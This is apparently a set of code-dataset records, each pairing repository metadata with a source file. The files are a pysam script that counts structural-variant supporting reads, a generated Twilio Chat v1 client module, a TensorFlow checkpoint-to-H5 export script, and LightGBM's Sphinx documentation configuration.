cigar_tuple_list=[] for n in range(0,cg_num): try: lt = lt+str(int(cigarstring[n])) except: if cigarstring[n]=='M': cigar_tuple_list.append((0,int(lt))) elif cigarstring[n]=='I': cigar_tuple_list.append((1,int(lt))) elif cigarstring[n]=='D': cigar_tuple_list.append((2,int(lt))) elif cigarstring[n]=='N': cigar_tuple_list.append((3,int(lt))) elif cigarstring[n]=='S': cigar_tuple_list.append((4,int(lt))) elif cigarstring[n]=='H': cigar_tuple_list.append((5,int(lt))) elif cigarstring[n]=='P': cigar_tuple_list.append((6,int(lt))) elif cigarstring[n]=='=': cigar_tuple_list.append((7,int(lt))) elif cigarstring[n]=='X': cigar_tuple_list.append((8,int(lt))) elif cigarstring[n]=='B': cigar_tuple_list.append((9,int(lt))) lt='' return cigar_tuple_list def estimate_mappedlength(cigarstring): # this function is same with read.reference_length made for MC tag or SA tag cg_num=len(cigarstring) lt='' current_m=0;current_d=0 for n in range(0,cg_num): try: lt = lt+str(int(cigarstring[n])) except: if cigarstring[n]=='M': current_m = 
current_m + int(lt) elif cigarstring[n]=='D' and current_m > 0: current_d = current_d +int(lt) else:'blank' lt='' return current_m+current_d def find_M_range(cigar): m_start=0;m_end=0 # m_start: just before the start, m_end= the exact end cigar_list=make_cigartuple(cigar) m_count=0 for (t, n) in cigar_list: if t == 0: m_count +=1 if m_count ==1: for (t,n) in cigar_list: if t!=0 and t!=1: m_start+=n elif t==0: m_end=m_start+n break elif m_count > 1: find_m=0;m_length=0 for (t,n) in cigar_list: if find_m==0 and t!=0 and t!=1: m_start+=n elif find_m >0 and t!=0 and t!=1: m_length+=n elif t==0: find_m+=1 if find_m < m_count: m_length+=n elif find_m == m_count: m_end=m_start+m_length break return([m_start, m_end]) def change_chr_to_int(chr1): if chr1[0:2]=='GL': chr_n=25 elif chr1[0:3]=='NC_': chr_n=26 elif chr1=='hs37d5': chr_n = 27 elif chr1[0:2]=='JH': chr_n=28 else: chr_n=int(((chr1.replace('X','23')).replace('Y','24')).replace('MT','25')) return(chr_n) def find_interCigar_BP(info1, info2, read_size): # info eg.: 1,162768391,-,43S46M62S SA_chr1=info1.split(',')[0] SA_chr1n=change_chr_to_int(SA_chr1) SA_pos1=int(info1.split(',')[1]) SA_strand1=info1.split(',')[2] SA_cigar1=info1.split(',')[3] SA_chr2=info2.split(',')[0] SA_chr2n=change_chr_to_int(SA_chr2) SA_pos2=int(info2.split(',')[1]) SA_strand2=info2.split(',')[2] SA_cigar2=info2.split(',')[3] M_range1=find_M_range(SA_cigar1) M_range2=find_M_range(SA_cigar2) len1=M_range1[1]-M_range1[0] len2=M_range2[1]-M_range2[0] if SA_strand1 == SA_strand2: #same_direction if M_range1[0] <= M_range2[0] and M_range1[1] >= M_range2[1]: return('overlap') elif M_range2[0] <= M_range1[0] and M_range2[1] >= M_range1[1]: return('overlap') if M_range1[1] > M_range2[1]: MHLEN=M_range2[1]-M_range1[0] bp1=SA_pos1 bp2=SA_pos2+len2-1 terminal1="5";terminal2="3" if SA_chr1!=SA_chr2: rearr="TRA" else: if bp1<=bp2: rearr="DUP" elif bp1>bp2: rearr="DEL" elif M_range2[1] > M_range1[1]: MHLEN=M_range1[1]-M_range2[0] bp1=SA_pos1+len1-1 
bp2=SA_pos2 terminal1="3"; terminal2="5" if SA_chr1!=SA_chr2: rearr="TRA" else: if bp1<bp2: rearr="DEL" elif bp1>=bp2: rearr="DUP" else: 'blank' else: # opposite direction rvs_M_range1=[read_size-M_range1[1], read_size-M_range1[0]] if rvs_M_range1[0] <= M_range2[0] and rvs_M_range1[1] >= M_range2[1]: return('overlap') elif M_range2[0] <= rvs_M_range1[0] and M_range2[1] >= rvs_M_range1[1]: return('overlap') if rvs_M_range1[1] > M_range2[1]: MHLEN=M_range2[1]-rvs_M_range1[0] bp1=SA_pos1+len1-1 bp2=SA_pos2+len2-1 terminal1="3";terminal2="3" if SA_chr1!=SA_chr2: rearr="TRA" else: rearr="INV" elif M_range2[1] > rvs_M_range1[1]: MHLEN=rvs_M_range1[1]-M_range2[0] bp1=SA_pos1 bp2=SA_pos2 terminal1="5";terminal2="5" if SA_chr1!=SA_chr2: rearr="TRA" else: rearr="INV" else: 'blank' info=SA_chr1+':'+str(bp1)+';'+SA_chr2+':'+str(bp2)+';'+str(MHLEN)+';'+rearr+';'+terminal1+'to'+terminal2+';'+str(len1)+';'+str(len2) rvs_info=SA_chr2+':'+str(bp2)+';'+SA_chr1+':'+str(bp1)+';'+str(MHLEN)+';'+rearr+';'+terminal2+'to'+terminal1+';'+str(len2)+';'+str(len1) if SA_chr1n < SA_chr2n: return(info) elif SA_chr1n > SA_chr2n: return(rvs_info) elif SA_chr1n == SA_chr2n: if bp1 <= bp2: return(info) elif bp1 > bp2: return(rvs_info) def find_mate_from_SA(read): newBP_list=[];neoBP_list=[] reverse_list=['1','3','5','7','9','b','d','f'] cigar_info=read.cigarstring read_size=read.infer_read_length() SA_list=str(read.get_tag('SA')).split(';')[:-1] if hex(int(read.flag))[-2] in reverse_list: read_strand='-' else: read_strand='+' read_info=read.reference_name+','+str(read.reference_start+1)+','+read_strand+','+cigar_info for SA_indi in SA_list: res=find_interCigar_BP(read_info, SA_indi, read_size) if res != 'overlap': newBP_list.append(res) if len(SA_list)>1: info_combi=list(itertools.combinations(SA_list,2)) for (info1,info2) in info_combi: res=find_interCigar_BP(info1,info2,read_size) if res != 'overlap': neoBP_list.append(res) return(newBP_list, neoBP_list) def mate_list_summary(mate_list): 
summary_dic={} for mate in mate_list: mate_indi=mate.split(';') m1=int(mate_indi[5]) m2=int(mate_indi[6]) info=';'.join(mate_indi[0:5]) if info not in summary_dic.keys(): summary_dic[info]={} summary_dic[info]['num']=0 summary_dic[info]['match1']=[] summary_dic[info]['match2']=[] summary_dic[info]['num']+=1 summary_dic[info]['match1'].append(m1) summary_dic[info]['match2'].append(m2) final_list=[] for info in summary_dic.keys(): m1max=max(summary_dic[info]['match1']) m2max=max(summary_dic[info]['match2']) freq=summary_dic[info]['num'] final_list.append(info+';'+str(m1max)+';'+str(m2max)+'('+str(freq)+')') return (','.join(final_list)) def find_discordant_reads(chr1, pos1, ter1, chr2, pos2, ter2, pysam_file,sa_seq_list): pos1=int(pos1); pos2=int(pos2); ter1=int(ter1); ter2=int(ter2) new_mate_list=[];neo_mate_list=[] if ter1==3: pos1_start=pos1-fors; pos1_end=pos1+bacs elif ter1==5: pos1_start=pos1-bacs; pos1_end=pos1+fors if ter2==3: pos2_start=pos2-fors; pos2_end=pos2+bacs elif ter2==5: pos2_start=pos2-bacs; pos2_end=pos2+fors pos1_start=max(pos1_start, 1); pos2_start=max(pos2_start, 1) if chr1 == chr2 and ter1==5 and ter2 == 3 and pos1 < pos2: # exceptional short duplication pos1_end=min(pos1_end, pos1+(pos2-pos1)/2) pos2_start=max(pos2_start, pos2-(pos2-pos1)/2) elif chr1 == chr2 and ter1==3 and ter2 ==5 and pos2 < pos1: pos2_end=min(pos2_end, pos2+(pos1-pos2)/2) pos1_start=max(pos1_start, pos1-(pos1-pos2)/2) pair_true_list=[];sp_true_list=[];sa_true_list=[] pair_ref_list=[]; jx_ref_list=[] for read in pysam_file.fetch(chr1, pos1_start-1, pos1_end): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue if read.has_tag('SA')== True and ((ter1==3 and (read.cigartuples[-1][0]==4 or read.cigartuples[-1][0]==5)) or (ter1==5 and (read.cigartuples[0][0] ==4 or read.cigartuples[0][0] ==5))): SA_list=str(read.get_tag('SA')).split(';')[:-1] 
if read.is_reverse == True: PA_strand='+' elif read.is_reverse == False: PA_strand='-' SA_BP_candi=[] for SA_indi in SA_list: SA_chr=SA_indi.split(',')[0] SA_pos=int(SA_indi.split(',')[1]) SA_strand=SA_indi.split(',')[2] SA_cigar=SA_indi.split(',')[3] SA_cigartuples=make_cigartuple(SA_cigar) SA_MQ=SA_indi.split(',')[4] current_m=0; current_d=0 for cigar in SA_cigartuples: if cigar[0]==0: current_m=current_m+cigar[1] elif cigar[0]==2 and current_m > 0: current_d=current_d+cigar[1] elif (cigar[0]==4 or cigar[0]==5) and current_m > 0: break if ((SA_cigartuples[0][0]==4 or SA_cigartuples[0][0]==5) and SA_chr == chr2 and abs(SA_pos-pos2) <=1) or ((SA_cigartuples[-1][0]==4 or SA_cigartuples[-1][0]==5) and SA_chr == chr2 and abs(SA_pos + current_m + current_d-1-pos2) <=1): sa_true_list.append(read.query_name) sp_true_list.append(read.query_name) if ter1==3 and read.cigartuples[-1][0]==4: sc_seq=read.query_sequence[read.cigartuples[-1][1]*(-1): read.cigartuples[-1][1]*(-1)+sc_co] sa_seq_list.append(sc_seq) sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] elif ter1==5 and read.cigartuples[0][0]==4: sc_seq=read.query_sequence[read.cigartuples[0][1]-1-sc_co+1:read.cigartuples[0][1]-1+1] sa_seq_list.append(sc_seq) sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] sa_seq_list=list(set(sa_seq_list)) for read in pysam_file.fetch(chr1, pos1_start-1, pos1_end): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue pair_ref_mode='off';jx_ref_mode='off' if ter1==3: if read.is_reverse == False and read.mate_is_reverse == True and read.next_reference_name == chr1 and read.reference_start +1 < pos1 and read.reference_start +1 +read.template_length -1 > pos1 and read.template_length >= 0 and read.template_length < iscut: 
pair_ref_list.append(read.query_name) pair_ref_mode='on' if read.reference_start + 1 <= pos1 and read.reference_start + 1 + read.reference_length - 1 > pos1 and read.next_reference_name == chr1: jx_ref_list.append(read.query_name) jx_ref_mode='on' if pair_ref_mode == 'off' and read.is_reverse == False and read.next_reference_name == chr2 and read.next_reference_start +1 >= pos2_start and read.next_reference_start +1 < pos2_end: if (ter2==3 and read.mate_is_reverse == False) or (ter2==5 and read.mate_is_reverse == True): pair_true_list.append(read.query_name) if read.has_tag('SA') == True and read.query_name not in sa_true_list and read.query_name not in pair_ref_list: sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] if len(sa_seq_list) > 0: if pos1 - (read.reference_start +1) +1 == read.reference_length: if read.cigartuples[-1][0]==4 and read.cigartuples[-1][1] >= sc_co: sc_seq=read.query_sequence[read.cigartuples[-1][1]*(-1): read.cigartuples[-1][1]*(-1)+sc_co] if sc_seq in sa_seq_list: sp_true_list.append(read.query_name) elif ter1==5: if read.is_reverse == True and read.mate_is_reverse == False and read.next_reference_name==chr1 and read.reference_start +1 + read.reference_length -1 >= pos1 and read.reference_start + 1 + read.reference_length -1 +read.template_length + 1 < pos1 and read.template_length < 0 and read.template_length*(-1) < iscut: # in this situation read.template_length is negative value pair_ref_list.append(read.query_name) pair_ref_mode='on' if read.reference_start + 1 < pos1 and read.reference_start + 1 + read.reference_length - 1 >= pos1: jx_ref_list.append(read.query_name) jx_ref_mode='on' if pair_ref_mode=='off' and read.is_reverse == True and read.next_reference_name == chr2 and read.next_reference_start +1 >= pos2_start and read.next_reference_start +1 < pos2_end: if (ter2==3 and read.mate_is_reverse == False) or (ter2==5 and read.mate_is_reverse == True): 
pair_true_list.append(read.query_name) if read.has_tag('SA') == True and read.query_name not in sa_true_list and read.query_name not in pair_ref_list: sa_res=find_mate_from_SA(read) new_mate_list=new_mate_list+sa_res[0] neo_mate_list=neo_mate_list+sa_res[1] if len(sa_seq_list) > 0: if read.reference_start + 1 == pos1: if read.cigartuples[0][0] == 4 and read.cigartuples[0][1] >= sc_co: sc_seq=read.query_sequence[read.cigartuples[0][1]-1-sc_co+1:read.cigartuples[0][1]-1+1] if sc_seq in sa_seq_list: sp_true_list.append(read.query_name) sa_true_list=list(set(sa_true_list)) pair_ref_list=list(set(pair_ref_list)) jx_ref_list=list(set(jx_ref_list) & set(pair_ref_list)) all_ref_list=list(set(pair_ref_list+jx_ref_list)-set(sa_true_list)) pair_true_list=list(set(pair_true_list)-set(all_ref_list)) sp_true_list=list(set(sp_true_list)) all_true_list=list(set(pair_true_list+sp_true_list+sa_true_list)) if len(new_mate_list)==0: new_mate='NA' else: new_mate=mate_list_summary(new_mate_list) if len(neo_mate_list)==0: neo_mate='NA' else: neo_mate=mate_list_summary(neo_mate_list) return([pair_true_list, sp_true_list, sa_true_list, pair_ref_list, jx_ref_list, all_ref_list, sa_seq_list, new_mate,neo_mate]) def calc_final_count(chr1, pos1, ter1, chr2, pos2, ter2, t_bam, n_bam): pos1=int(pos1); pos2=int(pos2); ter1=int(ter1); ter2=int(ter2) a1=0; as1=0; asa1=0;r1=0;rj1=0; r2=0; rj2=0; na1=0; nsa1=0 normal_split1='off';normal_split2='off' sa_seq_list=[] t1_list=find_discordant_reads(chr1,pos1,ter1,chr2,pos2,ter2,t_bam,sa_seq_list) sa_seq_list=t1_list[6] new_mate1=t1_list[7] neo_mate1=t1_list[8] n1_list=find_discordant_reads(chr1,pos1,ter1,chr2,pos2,ter2,n_bam,sa_seq_list) sa_seq_list=[] t2_list=find_discordant_reads(chr2,pos2,ter2,chr1,pos1,ter1,t_bam,sa_seq_list) sa_seq_list=t2_list[6] new_mate2=t2_list[7] neo_mate2=t2_list[8] n2_list=find_discordant_reads(chr2,pos2,ter2,chr1,pos1,ter1,n_bam,sa_seq_list) n1_pair_list=n1_list[0] n1_sp_list=n1_list[1] n1_sa_list=n1_list[2] 
n2_pair_list=n2_list[0] n2_sp_list=n2_list[1] n2_sa_list=n2_list[2] t1_pair_list=t1_list[0] t1_sp_list=t1_list[1] t1_sa_list=t1_list[2] t1_rj_list=t1_list[4] t1_rt_list=t1_list[5] t2_pair_list=t2_list[0] t2_sp_list=t2_list[1] t2_sa_list=t2_list[2] t2_rj_list=t2_list[4] t2_rt_list=t2_list[5] t1_total_list=list(set(t1_pair_list+t1_sp_list+t1_sa_list)) t1_sp_list=list(set(t1_sp_list+t1_sa_list)) t2_total_list=list(set(t2_pair_list+t2_sp_list+t2_sa_list)) t2_sp_list=list(set(t2_sp_list+t2_sa_list)) t_tot_n=len(list(set(t1_total_list+t2_total_list))) t_split_n=len(list(set(t1_sp_list+t2_sp_list))) t_sa_n=len(list(set(t1_sa_list+t2_sa_list))) t1_reftot_n=len(t1_rt_list) t1_refjx_n=len(t1_rj_list) t2_reftot_n=len(t2_rt_list) t2_refjx_n=len(t2_rj_list) n_tot_n=len(list(set(n1_pair_list+n1_sa_list+n2_pair_list+n2_sa_list))) n_sa_n=len(list(set(n1_sa_list+n2_sa_list))) return([t_tot_n, t_split_n,t_sa_n, t1_reftot_n, t1_refjx_n, t2_reftot_n, t2_refjx_n, n_tot_n, n_sa_n, new_mate1, neo_mate1, new_mate2, neo_mate2]) def count_frag_num(chr1, pos1, pysam_file): pos1=int(pos1);total_frag_list=[] for read in pysam_file.fetch(chr1, pos1-1, pos1): if read.is_unmapped == True or read.is_paired == False or read.mate_is_unmapped == True or read.is_secondary == True or read.is_supplementary == True or read.is_duplicate == True: continue total_frag_list.append(read.query_name) total_frag_list=list(set(total_frag_list)) return len(total_frag_list) while sv_line: if sv_line[0:4]=='#CHR': out_file.write(sv_line+'\tTumor_Ref1;Ref2;AllDiscordantFragments;SplitFragments;SATagFragments;Vaf1;Vaf2\tPairNormal_AllFragments;SAFragments;FragCount1;FragCount2\tnew_mate1\tneo_mate1\tnew_mate2\tneo_mate2\n') elif sv_line[0]=='#': out_file.write(sv_line+'\n') else: shortDstatus='off' sv_indi=sv_line.split('\t') chr1=sv_indi[c_chr1]; pos1=sv_indi[c_pos1]; chr2=sv_indi[c_chr2]; pos2=sv_indi[c_pos2] svtype=sv_indi[c_type] if pos2 == '.' 
or svtype == 'INS': print_list=[sv_line, '.','.','.','.','.','.'] else: ter1=sv_indi[c_ter].split('to')[0]; ter2=sv_indi[c_ter].split('to')[1] res = calc_final_count(chr1, pos1, ter1, chr2, pos2, ter2, t_file, n_file) adf=res[0];sf=res[1];saf=res[2];ref1=res[3];rj1=res[4];ref2=res[5];rj2=res[6];na1=res[7];nsa1=res[8] new_mate1=res[9]; neo_mate1=res[10]; new_mate2=res[11]; neo_mate2=res[12] pnfc1=count_frag_num(chr1, pos1, n_file) pnfc2=count_frag_num(chr2, pos2, n_file) if chr1 == chr2 and ter1 == '3' and ter2 == '5' and abs(int(pos2)-int(pos1)) < shortDco: adf=sf ref1=rj1 ref2=rj2 elif adf == sf: ref1=rj1 ref2=rj2 if adf+ref1 == 0: vaf1 = 'NA' else: vaf1=str(round((adf)*100/float(adf+ref1),2))+'%' if adf+ref2 == 0: vaf2 = 'NA' else: vaf2=str(round((adf)*100/float(adf+ref2),2))+'%' # asr1 and asr2 were not counted in 'else' d/t redundancy with r1, r2 t_info_list=[str(ref1),str(ref2),str(adf),str(sf),str(saf),vaf1,vaf2] n_info_list=[str(na1),str(nsa1),str(pnfc1), str(pnfc2)] print_list=[sv_line, ';'.join(t_info_list), ';'.join(n_info_list), new_mate1, neo_mate1, new_mate2, neo_mate2] out_file.write('\t'.join(print_list)+'\n') sv_line=sv_file.readline().strip()
[ "hs960201@gmail.com" ]
hs960201@gmail.com
17cc97ea656c6d3d58dba14ba7110219c4c455a7
9e27f91194541eb36da07420efa53c5c417e8999
/twilio/rest/chat/v1/__init__.py
7698c973fa1814942bb972c9ac2a08709c89c066
[]
no_license
iosmichael/flask-admin-dashboard
0eeab96add99430828306b691e012ac9beb957ea
396d687fd9144d3b0ac04d8047ecf726f7c18fbd
refs/heads/master
2020-03-24T05:55:42.200377
2018-09-17T20:33:42
2018-09-17T20:33:42
142,508,888
0
1
null
null
null
null
UTF-8
Python
false
false
1,299
py
# coding=utf-8
"""
This code was generated by
\ / _    _  _|   _  _
 | (_)\/(_)(_|\/| |(/_  v1.0.0
      /       /
"""

from admin.twilio.base.version import Version
from admin.twilio.rest.chat.v1.credential import CredentialList
from admin.twilio.rest.chat.v1.service import ServiceList


class V1(Version):
    """Version v1 of the Chat domain, exposing credential and service lists."""

    def __init__(self, domain):
        """
        Initialize the V1 version of Chat

        :returns: V1 version of Chat
        :rtype: twilio.rest.chat.v1.V1.V1
        """
        super(V1, self).__init__(domain)
        self.version = 'v1'
        # List resources are created lazily on first property access.
        self._credentials = None
        self._services = None

    @property
    def credentials(self):
        """
        :rtype: twilio.rest.chat.v1.credential.CredentialList
        """
        cached = self._credentials
        if cached is None:
            cached = CredentialList(self)
            self._credentials = cached
        return cached

    @property
    def services(self):
        """
        :rtype: twilio.rest.chat.v1.service.ServiceList
        """
        cached = self._services
        if cached is None:
            cached = ServiceList(self)
            self._services = cached
        return cached

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Chat.V1>'
[ "michaelliu@iresearch.com.cn" ]
michaelliu@iresearch.com.cn
68a6a2550cc81753aa234a09cb81ae0d79c49c3b
2b15168bc67ee935446f51c46045f73346369c5a
/extract_ckpt_to_h5_weight.py
faeda2d12d610e45a0d94bce680cbd2a9bfed7bc
[]
no_license
jason9075/tf2_arcface
6c37500c9c14170ea6731f6a0d79a19f088c32d3
6fabcdf9c3c9a12603456476fc8052de2830684d
refs/heads/master
2023-04-30T11:42:52.845549
2021-04-01T06:59:39
2021-04-01T06:59:39
311,858,885
0
0
null
null
null
null
UTF-8
Python
false
false
501
py
import tensorflow as tf

from convert_tensorflow import create_training_model

# Training-time constants: class count, input resolution, checkpoint to export.
num_of_class = 20000
IMAGE_SIZE = (112, 112)
CKPT = 'checkpoints/2021-03-29-10-26-19_e_1400'
MODEL_TYPE = 'mobilenetv3'


def main():
    """Rebuild the training model, load weights from CKPT, and export it as an HDF5 file.

    The exported file is named after the checkpoint's basename under saved_model/.
    """
    model = create_training_model(IMAGE_SIZE, num_of_class, mode='train', model_type=MODEL_TYPE)
    model.load_weights(CKPT)

    # Basename of the checkpoint path, e.g. '2021-03-29-10-26-19_e_1400'.
    filename = CKPT.split('/')[-1]

    # Bug fix: the original f-string had no placeholder ('saved_model/(unknown).h5'),
    # so `filename` was never used and every export clobbered the same literal path.
    model.save(f'saved_model/{filename}.h5', include_optimizer=True, save_format='h5')


if __name__ == '__main__':
    main()
[ "jason9075@gmail.com" ]
jason9075@gmail.com
d0df7bd7de21e649e7b4d18ce66c317f65bf0a22
9e9e0b52248d8c4a9026d266ebeb02529bbc8e9f
/lightGBM/docs/conf.py
637447ed627ca9d6df815867ffeda3b97017e4f6
[ "MIT", "Apache-2.0", "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
arXiv-research/Quatm
79b870a754eb8173675da7316b10c6dac76de92f
541fc48b88f4236767059f3265c7d34b9eacb85f
refs/heads/main
2023-07-16T13:37:54.326816
2021-09-03T11:17:22
2021-09-03T11:17:22
338,906,115
2
1
MIT
2021-09-03T11:17:23
2021-02-14T21:30:28
C++
UTF-8
Python
false
false
11,826
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # LightGBM documentation build configuration file, created by # sphinx-quickstart on Thu May 4 14:30:58 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute. """Sphinx configuration file.""" import datetime import os import sys from distutils.dir_util import copy_tree from re import compile from subprocess import PIPE, Popen from unittest.mock import Mock import sphinx from docutils.nodes import reference from docutils.parsers.rst import Directive from docutils.transforms import Transform from sphinx.errors import VersionRequirementError CURR_PATH = os.path.abspath(os.path.dirname(__file__)) LIB_PATH = os.path.join(CURR_PATH, os.path.pardir, 'python-package') sys.path.insert(0, LIB_PATH) INTERNAL_REF_REGEX = compile(r"(?P<url>\.\/.+)(?P<extension>\.rst)(?P<anchor>$|#)") # -- mock out modules MOCK_MODULES = ['numpy', 'scipy', 'scipy.sparse', 'sklearn', 'matplotlib', 'pandas', 'graphviz', 'dask', 'dask.distributed'] for mod_name in MOCK_MODULES: sys.modules[mod_name] = Mock() class InternalRefTransform(Transform): """Replaces '.rst' with '.html' in all internal links like './[Something].rst[#anchor]'.""" default_priority = 210 """Numerical priority of this transform, 0 through 999.""" def apply(self, **kwargs): """Apply the transform to the document tree.""" for section in self.document.traverse(reference): if section.get("refuri") is not None: section["refuri"] = INTERNAL_REF_REGEX.sub(r"\g<url>.html\g<anchor>", section["refuri"]) class IgnoredDirective(Directive): 
"""Stub for unknown directives.""" has_content = True def run(self): """Do nothing.""" return [] # -- General configuration ------------------------------------------------ os.environ['LIGHTGBM_BUILD_DOC'] = '1' C_API = os.environ.get('C_API', '').lower().strip() != 'no' RTD = bool(os.environ.get('READTHEDOCS', '')) # If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = '2.1.0' # Due to sphinx.ext.napoleon, autodoc_typehints if needs_sphinx > sphinx.__version__: message = f'This project needs at least Sphinx v{needs_sphinx}' raise VersionRequirementError(message) # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon', ] autodoc_default_flags = ['members', 'inherited-members', 'show-inheritance'] autodoc_default_options = { "members": True, "inherited-members": True, "show-inheritance": True, } # hide type hints in API docs autodoc_typehints = "none" # Generate autosummary pages. Output should be set with: `:toctree: pythonapi/` autosummary_generate = ['Python-API.rst'] # Only the class' docstring is inserted. autoclass_content = 'class' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # The master toctree document. master_doc = 'index' # General information about the project. project = 'LightGBM' copyright = f'{datetime.datetime.now().year}, Microsoft Corporation' author = 'Microsoft Corporation' # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = os.path.join(CURR_PATH, 'logo', 'LightGBM_logo_grey_text.svg') # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. 
html_favicon = os.path.join(CURR_PATH, '_static', 'images', 'favicon.ico') # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. with open(os.path.join(CURR_PATH, os.path.pardir, 'VERSION.txt'), 'r') as f: # The short X.Y version. version = f.read().strip() # The full version, including alpha/beta/rc tags. release = version # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'default' # -- Configuration for C API docs generation ------------------------------ if C_API: extensions.extend([ 'breathe', ]) breathe_projects = { "LightGBM": os.path.join(CURR_PATH, 'doxyoutput', 'xml') } breathe_default_project = "LightGBM" breathe_domain_by_extension = { "h": "c", } breathe_show_define_initializer = True c_id_attributes = ['LIGHTGBM_C_EXPORT'] # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { 'includehidden': False, 'logo_only': True, } # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. 
They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'LightGBMdoc' # -- Options for LaTeX output --------------------------------------------- # The name of an image file (relative to this directory) to place at the top of # the title page. latex_logo = os.path.join(CURR_PATH, 'logo', 'LightGBM_logo_black_text_small.png') def generate_doxygen_xml(app): """Generate XML documentation for C API by Doxygen. Parameters ---------- app : object The application object representing the Sphinx process. """ input = os.path.join(CURR_PATH, os.path.pardir, 'include', 'LightGBM', 'c_api.h') doxygen_args = [ f"INPUT={input}", f"OUTPUT_DIRECTORY={os.path.join(CURR_PATH, 'doxyoutput')}", "GENERATE_HTML=NO", "GENERATE_LATEX=NO", "GENERATE_XML=YES", "XML_OUTPUT=xml", "XML_PROGRAMLISTING=YES", r'ALIASES="rst=\verbatim embed:rst:leading-asterisk"', r'ALIASES+="endrst=\endverbatim"', "ENABLE_PREPROCESSING=YES", "MACRO_EXPANSION=YES", "EXPAND_ONLY_PREDEF=NO", "SKIP_FUNCTION_MACROS=NO", "SORT_BRIEF_DOCS=YES", "WARN_AS_ERROR=YES", ] doxygen_input = '\n'.join(doxygen_args) doxygen_input = bytes(doxygen_input, "utf-8") if not os.path.exists(os.path.join(CURR_PATH, 'doxyoutput')): os.makedirs(os.path.join(CURR_PATH, 'doxyoutput')) try: # Warning! The following code can cause buffer overflows on RTD. # Consider suppressing output completely if RTD project silently fails. 
# Refer to https://github.com/svenevs/exhale # /blob/fe7644829057af622e467bb529db6c03a830da99/exhale/deploy.py#L99-L111 process = Popen(["doxygen", "-"], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, stderr = process.communicate(doxygen_input) output = '\n'.join([i.decode('utf-8') for i in (stdout, stderr) if i is not None]) if process.returncode != 0: raise RuntimeError(output) else: print(output) except BaseException as e: raise Exception(f"An error has occurred while executing Doxygen\n{e}") def generate_r_docs(app): """Generate documentation for R-package. Parameters ---------- app : object The application object representing the Sphinx process. """ commands = f""" /home/docs/.conda/bin/conda create \ -q \ -y \ -c conda-forge \ -n r_env \ cmake=3.18.2=ha30ef3c_0 \ r-base=4.0.3=ha43b4e8_3 \ r-data.table=1.13.2=r40h0eb13af_0 \ r-jsonlite=1.7.1=r40hcdcec82_0 \ r-matrix=1.2_18=r40h7fa42b6_3 \ r-pkgdown=1.6.1=r40h6115d3f_0 \ r-roxygen2=7.1.1=r40h0357c0b_0 source /home/docs/.conda/bin/activate r_env export TAR=/bin/tar cd {os.path.join(CURR_PATH, os.path.pardir)} export R_LIBS="$CONDA_PREFIX/lib/R/library" Rscript build_r.R || exit -1 cd {os.path.join(CURR_PATH, os.path.pardir, "lightgbm_r")} Rscript -e "roxygen2::roxygenize(load = 'installed')" || exit -1 Rscript -e "pkgdown::build_site( \ lazy = FALSE \ , install = FALSE \ , devel = FALSE \ , examples = TRUE \ , run_dont_run = TRUE \ , seed = 42L \ , preview = FALSE \ , new_process = TRUE \ ) " || exit -1 cd {os.path.join(CURR_PATH, os.path.pardir)} """ try: # Warning! The following code can cause buffer overflows on RTD. # Consider suppressing output completely if RTD project silently fails. 
# Refer to https://github.com/svenevs/exhale # /blob/fe7644829057af622e467bb529db6c03a830da99/exhale/deploy.py#L99-L111 process = Popen(['/bin/bash'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True) stdout, stderr = process.communicate(commands) output = '\n'.join([i for i in (stdout, stderr) if i is not None]) if process.returncode != 0: raise RuntimeError(output) else: print(output) except BaseException as e: raise Exception(f"An error has occurred while generating documentation for R-package\n{e}") def setup(app): """Add new elements at Sphinx initialization time. Parameters ---------- app : object The application object representing the Sphinx process. """ first_run = not os.path.exists(os.path.join(CURR_PATH, '_FIRST_RUN.flag')) if first_run and RTD: open(os.path.join(CURR_PATH, '_FIRST_RUN.flag'), 'w').close() if C_API: app.connect("builder-inited", generate_doxygen_xml) else: app.add_directive('doxygenfile', IgnoredDirective) if RTD: # build R docs only on Read the Docs site if first_run: app.connect("builder-inited", generate_r_docs) 